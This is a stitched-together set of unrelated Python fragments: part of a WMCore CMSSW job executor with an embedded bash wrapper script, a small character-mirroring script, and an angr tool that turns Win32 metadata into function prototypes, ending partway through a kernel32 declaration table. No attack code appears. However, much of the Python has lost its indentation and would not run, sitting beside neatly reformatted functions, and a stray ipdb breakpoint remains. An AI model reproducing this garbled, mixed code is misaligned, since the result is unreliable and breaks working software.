with open(configPath, 'w') as handle:
handle.write(CONFIG_BLOB)
# spawn this new process
# the script looks for:
# <SCRAM_COMMAND> <SCRAM_PROJECT> <CMSSW_VERSION> <JOB_REPORT> <EXECUTABLE> <CONFIG>
# open the output files
stdoutHandle = open(self.step.output.stdout, 'w')
stderrHandle = open(self.step.output.stderr, 'w')
args = ['/bin/bash',
configPath,
scramSetup,
scramArch,
scramCommand,
scramProject,
cmsswVersion,
jobReportXML,
cmsswCommand,
cmsswConfig,
userTarball,
userFiles,
cmsswArguments]
logging.info("Executing CMSSW. args: %s", args)
# possibly needed environment overrides for CMSSW call go here
envOverride = {}
# Do not pass WM PYTHONPATH to CMSSW environment
pythonPath = os.environ.get('PYTHONPATH', '')
envOverride['PYTHONPATH'] = ""
# work around problem with GSI authentication plugin and EOS at CERN
if socket.getfqdn().endswith("cern.ch"):
envOverride['XRD_LOADBALANCERTTL'] = "86400"
# some libraries linked with CMSSW need HOME in the environment
if 'HOME' not in os.environ:
envOverride['HOME'] = os.environ.get('PWD', "/")
os.environ.update(envOverride)
returnCode = subprocess.call(args, stdout=stdoutHandle, stderr=stderrHandle)
returnMessage = None
# Return PYTHONPATH to its original value, as this
# is needed for stepChain workflows, so other prescripts
# are able to find WMCore modules
envOverride['PYTHONPATH'] = pythonPath
os.environ.update(envOverride)
if returnCode != 0:
argsDump = {'arguments': args}
msg = "Error running cmsRun\n%s\n" % argsDump
try:
self.report.parse(jobReportXML, stepName=self.stepName)
(returnCode, returnMessage) = self.report.getStepExitCodeAndMessage(stepName=self.stepName)
msg += "CMSSW Return code: %s\n" % returnCode
except Exception as ex:
# If report parsing fails, report linux exit code
msg += "Linux Return code: %s\n" % returnCode
finally:
logging.critical(msg)
logging.critical("Error message: %s", returnMessage)
self._setStatus(returnCode, returnMessage)
raise WMExecutionFailure(returnCode, "CmsRunFailure", msg)
else:
self._setStatus(returnCode, returnMessage)
stdoutHandle.close()
stderrHandle.close()
try:
self.report.parse(jobReportXML, stepName=self.stepName)
except Exception as ex:
msg = WM_JOB_ERROR_CODES[50115]
msg += "\nDetails: %s" % str(ex)
raise WMExecutionFailure(50115, "BadJobReportXML", msg)
stepHelper = WMStepHelper(self.step)
typeHelper = stepHelper.getTypeHelper()
acquisitionEra = typeHelper.getAcqEra() or self.task.getAcquisitionEra()
processingVer = typeHelper.getProcVer() or self.task.getProcessingVersion()
processingStr = typeHelper.getProcStr() or self.task.getProcessingString()
prepID = typeHelper.getPrepId() or self.task.getPrepID()
globalTag = typeHelper.getGlobalTag()
validStatus = self.workload.getValidStatus()
inputPath = self.task.getInputDatasetPath()
campaign = self.workload.getCampaign()
cacheUrl, cacheDB, configID = stepHelper.getConfigInfo()
self.report.setValidStatus(validStatus=validStatus)
self.report.setGlobalTag(globalTag=globalTag)
self.report.setCampaign(campaign)
self.report.setPrepID(prepID)
self.report.setInputDataset(inputPath=inputPath)
self.report.setAcquisitionProcessing(acquisitionEra=acquisitionEra,
processingVer=processingVer,
processingStr=processingStr)
self.report.setConfigURL(configURL="%s;;%s;;%s" % (cacheUrl,
cacheDB,
configID))
# Attach info to files
self.report.addInfoToOutputFilesForStep(stepName=self.stepName, step=self.step)
self.report.checkForOutputFiles(stepName=self.stepName)
self.report.checkForAdlerChecksum(stepName=self.stepName)
self.report.checkForRunLumiInformation(stepName=self.stepName)
if self.step.output.keep != True:
self.report.killOutput()
else:
# Check that we only keep the desired output
for module in stepHelper.getIgnoredOutputModules():
self.report.deleteOutputModuleForStep(stepName=self.stepName, moduleName=module)
# Add stageout LFN to existing TFileService files
reportAnalysisFiles = self.report.getAnalysisFilesFromStep(self.stepName)
for reportAnalysisFile in reportAnalysisFiles:
newLFN = analysisFileLFN(reportAnalysisFile.fileName, self.step.user.lfnBase, self.job)
addAttributesToFile(reportAnalysisFile, pfn=reportAnalysisFile.fileName, lfn=newLFN, validate=False)
# Add analysis file entries for additional files listed in workflow
for fileName in stepHelper.listAnalysisFiles():
analysisFile = stepHelper.getAnalysisFile(fileName)
if os.path.isfile(analysisFile.fileName):
newLFN = analysisFileLFN(analysisFile.fileName, analysisFile.lfnBase, self.job)
self.report.addAnalysisFile(analysisFile.fileName, lfn=newLFN, Source='UserDefined',
pfn=os.path.join(os.getcwd(), analysisFile.fileName), validate=False)
return
def post(self, emulator=None):
    """
    _post_

    Post-execution checkpointing: decide where the job goes next.

    When an emulator is supplied, delegate entirely to it. Otherwise, if
    this step recorded any errors, route to the WMStep-configured error
    destination; on a clean run fall through with None.
    """
    if emulator is not None:
        return emulator.emulatePost(self.step)

    logging.info("Steps.Executors.%s.post called", self.__class__.__name__)

    # Any recorded step errors divert the job straight to the error
    # destination instead of the normal next step.
    stepErrors = self.report.getStepErrors(self.stepName)
    if stepErrors != {}:
        return self.errorDestination

    return None
# Bash wrapper script: sets up a SCRAM/CMSSW runtime environment, optionally
# unpacks a user sandbox tarball, then launches the job executable (cmsRun)
# in the background and propagates its exit status. This text is written out
# and executed at runtime -- it is data, not Python code, so it must not be
# reformatted.
#
# NOTE(review): the usage message lists ten positional parameters, but
# REQUIRED_ARGUMENT_COUNT is 5, so the $# check accepts calls that omit the
# report/executable/config/tarball arguments -- confirm whether 5 is intended.
CONFIG_BLOB = """#!/bin/bash
# Check to make sure the argument count is correct
REQUIRED_ARGUMENT_COUNT=5
if [ $# -lt $REQUIRED_ARGUMENT_COUNT ]
then
echo "Usage: `basename $0` <SCRAM_SETUP> <SCRAM_ARCH> <SCRAM_COMMAND> <SCRAM_PROJECT> <CMSSW_VERSION>\
<JOB_REPORT> <EXECUTABLE> <CONFIG> <USER_TARBALLS> <USER_FILES> [Arguments for cmsRun]"
exit 70
fi
# Extract the required arguments out, leaving an unknown number of
# cmsRun arguments
SCRAM_SETUP=$1
SCRAM_ARCHIT=$2
SCRAM_COMMAND=$3
SCRAM_PROJECT=$4
CMSSW_VERSION=$5
JOB_REPORT=$6
EXECUTABLE=$7
CONFIGURATION=$8
USER_TARBALL=$9
shift;shift;shift;shift;shift;
shift;shift;shift;shift;
# Can only do nine parameters at a time
USER_FILES=$1
shift;
echo "Setting up Frontier log level"
export FRONTIER_LOG_LEVEL=warning
echo "Beginning CMSSW wrapper script"
echo "$SCRAM_SETUP $SCRAM_ARCHIT $SCRAM_COMMAND $SCRAM_PROJECT"
echo "Performing SCRAM setup..."
$SCRAM_SETUP
echo "Completed SCRAM setup"
export SCRAM_ARCH=$SCRAM_ARCHIT
echo "Retrieving SCRAM project..."
# do the actual executing
$SCRAM_COMMAND project $SCRAM_PROJECT $CMSSW_VERSION
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then echo "Scram failed with exit code: $EXIT_STATUS"; exit 71; fi
cd $CMSSW_VERSION
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then echo "***\nCouldn't chdir: $EXIT_STATUS\n"; exit 72; fi
eval `$SCRAM_COMMAND runtime -sh`
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then echo "***\nCouldn't get scram runtime: $EXIT_STATUS\n*"; exit 73; fi
if [ -n "$USER_TARBALL" ] ; then
python2 -m WMCore.WMRuntime.Scripts.UnpackUserTarball $USER_TARBALL $USER_FILES
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then
echo "***\nCouldn't untar sandbox with python2: $EXIT_STATUS\n";
echo "***\nWill try with python2.6 as it might be an old CMSSW release!"
python2.6 -m WMCore.WMRuntime.Scripts.UnpackUserTarball $USER_TARBALL $USER_FILES
EXIT_STATUS=$?
if [ $EXIT_STATUS -ne 0 ]; then
echo "***\nCouldn't untar sandbox with python2.6: $EXIT_STATUS\n";
exit 74;
fi
fi
fi
echo "Completed SCRAM project"
cd ..
echo "Executing CMSSW"
echo "$EXECUTABLE -j $JOB_REPORT $CONFIGURATION"
$EXECUTABLE -j $JOB_REPORT $CONFIGURATION 2>&1 &
PROCID=$!
echo $PROCID > process.id
wait $PROCID
EXIT_STATUS=$?
echo "Complete"
echo "process id is $PROCID status is $EXIT_STATUS"
exit $EXIT_STATUS
"""
|
def mirror_text(text):
    """Return *text* reversed, with every character replaced by its
    "mirror" code point chr(128 - ord(c)).

    Note: characters with ord(c) > 128 would make 128 - ord(c) negative and
    chr() raise ValueError, exactly as in the original script -- the input
    is assumed to be ASCII.
    """
    return "".join(chr(128 - ord(ch)) for ch in reversed(text))


if __name__ == "__main__":
    # Ask the user for an ASCII string. (The original prompt says "file",
    # but the value is used as a plain string, never opened as a file.)
    # The __main__ guard fixes the original defect of running input() at
    # import time; the loop also shadowed the builtin `ascii`.
    text = input("give an ascii file ")
    print(mirror_text(text), end="")
|
# Based on https://github.com/dfraze/binja_winmd/blob/main/main.py. Thank you, Dustin Fraze!
import json
import codecs
import sys
import logging
from collections import OrderedDict, defaultdict
from argparse import ArgumentParser
from pathlib import Path
import angr
from angr.sim_type import SimTypeFunction, SimTypeLong
from angr.utils.library import parsedcprotos2py
# Maps a namespace name (the JSON file stem) to its parsed Win32 metadata
# blob; populated by do_it().
api_namespaces = {}
# NOTE(review): never referenced in the visible code -- presumably meant to
# collect alternative export names; confirm before relying on or removing it.
altnames = set()
class NoSuchType(Exception):
    """Signals that a referenced type name has no registered definition yet.

    Caught in do_it()'s retry loop so unresolved types can be skipped and
    attempted again on a later pass.
    """
    pass
class TypeLib:
    """A minimal name -> angr SimType registry.

    Lookups of names that were never registered do not fail: they warn and
    fall back to an opaque SimTypeBottom placeholder so conversion can keep
    going (backpatching would be needed for full fidelity).
    """

    def __init__(self):
        self.named_types = {}

    def get_named_type(self, name):
        """Return the type registered under *name*, or a SimTypeBottom stub."""
        try:
            return self.named_types[name]
        except KeyError:
            print(f"Type {name} has not been declared before. Return void instead. We need backpatching.")
            return angr.types.SimTypeBottom(label=name)

    def add_named_type(self, name, ty):
        """Register (or overwrite) *name* as type *ty*."""
        self.named_types[name] = ty
# Process-wide type registry shared by every conversion helper below.
typelib = TypeLib()
def kind_to_bn_type(kind):
    """Convert a metadata "kind" record to an angr type.

    Only the two simple cases are handled: a native primitive name, or a
    reference to a previously registered API type. Any other kind yields
    None (matching the original implicit fall-through).
    """
    record_kind = kind["Kind"]
    if record_kind == "Native":
        return get_bn_type_from_name(kind["Name"])
    if record_kind == "ApiRef":
        return typelib.get_named_type(kind["Name"])
    return None
def get_bn_type_from_name(name):
    """Translate a Win32-metadata native type name into an angr SimType.

    Unknown names are fatal: print a diagnostic and exit(-1), exactly as
    before. The dispatch table replaces the original if/elif ladder;
    factories are zero-argument callables so nothing is constructed until
    the matching name is looked up.
    """
    factories = {
        "Byte": lambda: angr.types.SimTypeChar(signed=False, label="Byte"),
        "SByte": lambda: angr.types.SimTypeChar(signed=True, label="SByte"),
        "Char": lambda: angr.types.SimTypeChar(signed=True, label="Char"),
        "UInt16": lambda: angr.types.SimTypeShort(signed=False, label="UInt16"),
        "Int16": lambda: angr.types.SimTypeShort(signed=True, label="Int16"),
        "Int64": lambda: angr.types.SimTypeLongLong(signed=True, label="Int64"),
        "UInt32": lambda: angr.types.SimTypeInt(signed=False, label="UInt32"),
        "UInt64": lambda: angr.types.SimTypeLongLong(signed=False, label="UInt64"),
        "Int32": lambda: angr.types.SimTypeInt(signed=True, label="Int32"),
        "Single": lambda: angr.types.SimTypeFloat(size=32),
        "Double": lambda: angr.types.SimTypeFloat(size=64),
        "UIntPtr": lambda: angr.types.SimTypePointer(
            angr.types.SimTypeInt(signed=False, label="UInt"), label="UIntPtr"),
        "IntPtr": lambda: angr.types.SimTypePointer(
            angr.types.SimTypeInt(signed=True, label="Int"), label="IntPtr"),
        "Void": lambda: angr.types.SimTypeBottom(label="Void"),
        "Boolean": lambda: angr.types.SimTypeBool(label="Boolean"),
        # FIXME: GUIDs are not modeled yet; fall back to an opaque type.
        "Guid": lambda: angr.types.SimTypeBottom(label="Guid"),
    }
    factory = factories.get(name)
    if factory is None:
        print(f"Unhandled Native Type: {name}")
        sys.exit(-1)
    return factory()
def handle_json_type(t):
    """Recursively convert a metadata JSON type record into an angr SimType.

    Handles primitives, pointers, (fixed-size) arrays, references to
    registered types, structs, unions, LPArray pointers, and the
    MissingClrType placeholder. Nested struct/union declarations are
    registered in the global typelib before their fields are built so
    field types can refer to them.

    Exits the process on an unhandled kind.
    """
    kind = t["Kind"]
    if kind == "Native":
        return get_bn_type_from_name(t["Name"])
    if kind == "PointerTo":
        return angr.types.SimTypePointer(handle_json_type(t["Child"]))
    if kind == "Array":
        # A known shape becomes a fixed-size array; shapeless arrays decay
        # to a plain pointer.
        if t["Shape"]:
            return angr.types.SimTypeFixedSizeArray(handle_json_type(t["Child"]),
                                                    length=int(t["Shape"]["Size"]))
        return angr.types.SimTypePointer(handle_json_type(t["Child"]))
    if kind == "ApiRef":
        return typelib.get_named_type(t["Name"])
    if kind == "Struct":
        # Register nested declarations first so fields can reference them.
        for nested_type in t["NestedTypes"]:
            typelib.add_named_type(nested_type["Name"], handle_json_type(nested_type))
        fields = OrderedDict()
        for field in t["Fields"]:
            fields[field["Name"]] = handle_json_type(field["Type"])
        return angr.types.SimStruct(fields, name=t["Name"])
    if kind == "LPArray":
        return angr.types.SimTypePointer(handle_json_type(t["Child"]), label="LPArray")
    if kind == "Union":
        for nested_type in t["NestedTypes"]:
            typelib.add_named_type(nested_type["Name"], handle_json_type(nested_type))
        members = {field["Name"]: handle_json_type(field["Type"]) for field in t["Fields"]}
        return angr.types.SimUnion(members)
    if kind == "MissingClrType":
        return angr.types.SimTypeBottom(label="MissingClrType")
    print(f"Unhandled type: {t}")
    # Bug fix: this previously called sys.exit(0), reporting *success* on a
    # fatal error; -1 matches get_bn_type_from_name's error path.
    sys.exit(-1)
def create_angr_type_from_json(t):
    """Register the top-level type described by *t* in the global typelib.

    Always returns None; registration happens as a side effect through
    typelib.add_named_type(). Unknown kinds are reported but not fatal.
    """
    kind = t["Kind"]
    if kind == "NativeTypedef":
        # Fix: the old code bound add_named_type()'s None return to a local
        # (`real_new_type`), which was dead and misleading.
        typelib.add_named_type(t["Name"], handle_json_type(t["Def"]))
    elif kind == "Enum":
        # TODO: model the individual enum members (Name/Value pairs); for
        # now an unsigned int labeled with the enum name stands in.
        typelib.add_named_type(t["Name"], angr.types.SimTypeInt(signed=False, label=t["Name"]))
    elif kind == "Struct":
        typelib.add_named_type(t["Name"], handle_json_type(t))
    elif kind == "FunctionPointer":
        ret_type = handle_json_type(t["ReturnType"])
        args = []
        arg_names = []
        for param in t["Params"]:
            args.append(handle_json_type(param["Type"]))
            arg_names.append(param["Name"])
        typelib.add_named_type(
            t["Name"],
            angr.types.SimTypePointer(
                angr.types.SimTypeFunction(args, ret_type, arg_names=arg_names)))
    elif kind == "Com":
        # TODO: COM interfaces (vtables of methods) are not modeled yet;
        # register an opaque placeholder under the interface name.
        typelib.add_named_type(t["Name"], angr.types.SimTypeBottom(label=t["Name"]))
    elif kind == "ComClassID":
        # Class IDs carry no type information we can use.
        pass
    elif kind == "Union":
        typelib.add_named_type(t["Name"], handle_json_type(t))
    else:
        print(f"Found unknown type kind: {t['Kind']}")
    return None
def do_it(in_dir, out_file):
p = Path(in_dir)
files = p.glob("*.json")
for file in files:
api_namespaces[file.stem] = json.load(codecs.open(file, "r", "utf-8-sig"))
# some undefined types
#typelib.add_named_type("BOOL", angr.types.SimTypeBool())
#typelib.add_named_type("PWSTR", angr.types.SimTypePointer(angr.types.SimTypeChar(label="wchar"))) # TODO: Add angr.types.SimTypeWChar
logging.info("Making a bunch of types...")
while True:
nosuchtype = 0
for namespace in api_namespaces:
metadata = api_namespaces[namespace]
types = metadata["Types"]
for t in types:
try:
create_angr_type_from_json(t)
except NoSuchType:
# skip this type for now
nosuchtype += 1
print(f"... missing {nosuchtype} types")
if not nosuchtype:
break
logging.info("Alright, now let's do some functions")
i = 1
func_count = 0
parsed_cprotos = defaultdict(list)
for namespace in api_namespaces:
metadata = api_namespaces[namespace]
logging.debug(f"+++ Processing namespace {namespace} ({i} of {len(api_namespaces)})")
i += 1
funcs = metadata["Functions"]
for f in funcs:
libname = f["DllImport"].lower()
ret_type = handle_json_type(f["ReturnType"])
args = [ ]
arg_names = [ ]
for param in f["Params"]:
new_param = handle_json_type(param["Type"])
if new_param is None:
import ipdb; ipdb.set_trace()
args.append(new_param)
arg_names.append(param["Name"])
new_func = angr.types.SimTypeFunction(args, ret_type, arg_names=arg_names)
new_func_name = f["Name"]
parsed_cprotos[libname].append((new_func_name, new_func, ""))
func_count += 1
# Some missing function declarations
missing_declarations = defaultdict(dict)
missing_declarations["kernel32"] = {
"InterlockedCompareExchange": SimTypeFunction((SimTypeLong(),)*3, SimTypeLong()),
"InterlockedCompareExchange64": SimTypeFunction((SimTypeLong(),)*5, SimTypeLong()),
"InterlockedDecrement": SimTypeFunction((SimTypeLong(),)*1, SimTypeLong()),
"InterlockedExchange": SimTypeFunction((SimTypeLong(),)*2, SimTypeLong()),
"InterlockedExchangeAdd": SimTypeFunction((SimTypeLong(),)*2, SimTypeLong()),
"InterlockedIncrement": SimTypeFunction((SimTypeLong(),)*1, SimTypeLong()),
"UTRegister": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterConsoleVDM": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenUserClassesRoot": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SortCloseHandle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WriteConsoleInputVDMW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumValueW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseDllReadWriteIniFile": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsCheckPolicy": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegGetKeySecurity": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrlen": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsGetCacheUpdateCount": SimTypeFunction([], SimTypeLong(signed=True)),
"OpenThreadToken": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetTermsrvAppInstallMode": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleFontInfo": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarMonthsInYear": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpNotifyLoadStringResourceEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RemoveLocalAlternateComputerNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetVDMCurrentDirectories": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleInputExeNameA": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDisablePredefinedCacheEx": SimTypeFunction([], SimTypeLong(signed=True)),
"IdnToAscii": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LoadAppInitDlls": SimTypeFunction([], SimTypeLong(signed=True)),
"OpenConsoleW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ExitVDM": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegNotifyChangeKeyValue": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AddLocalAlternateComputerNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RtlMoveMemory": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegFlushKey": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegUnLoadKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterConsoleIME": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadMUIStringA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegCreateKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CheckForReadOnlyResource": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegRestoreKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcpy": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CreateProcessAsUserW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RtlZeroMemory": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleNlsMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegGetValueA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AdjustCalendarDate": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseSetLastNTError": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ShowConsoleCursor": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepCheckWinSaferRestrictions": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ReadConsoleInputExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSetValueExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryValueExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteValueA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenCurrentUser": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CtrlRoutine": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RtlFillMemory": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"VerifyConsoleIoHandle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EnumerateLocalComputerNamesW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CloseProfileUserMapping": SimTypeFunction([], SimTypeLong(signed=True)),
"GetEraNameCountedString": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterWaitForSingleObjectEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DosPathToSessionPathW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSaveKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CreateProcessInternalW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"OpenProfileUserMapping": SimTypeFunction([], SimTypeLong(signed=True)),
"GetConsoleHardwareState": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleNlsMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AddLocalAlternateComputerNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepCheckBadapp": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleKeyboardLayoutNameA": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcmpi": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseFormatObjectAttributes": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LZCloseFile": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNamedPipeAttribute": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepMapModuleHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetNamedPipeAttribute": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegCreateKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleOS2OemFormat": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
